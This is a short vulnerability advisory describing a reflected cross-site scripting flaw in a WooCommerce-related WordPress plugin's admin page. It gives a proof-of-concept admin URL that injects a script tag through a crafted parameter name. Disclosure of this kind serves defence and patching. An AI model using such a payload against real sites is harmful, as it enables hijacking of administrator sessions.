The plugin does not sanitize and escape some URL parameters, leading to Reflected Cross-Site Scripting.
Ensure WooCommerce is installed. Visit the following path, while logged in as an Admin:
/wp-admin/admin.php?page=ppom&productmeta_id=5&do_meta=edit&"><script>alert(/XSS/)</script>=1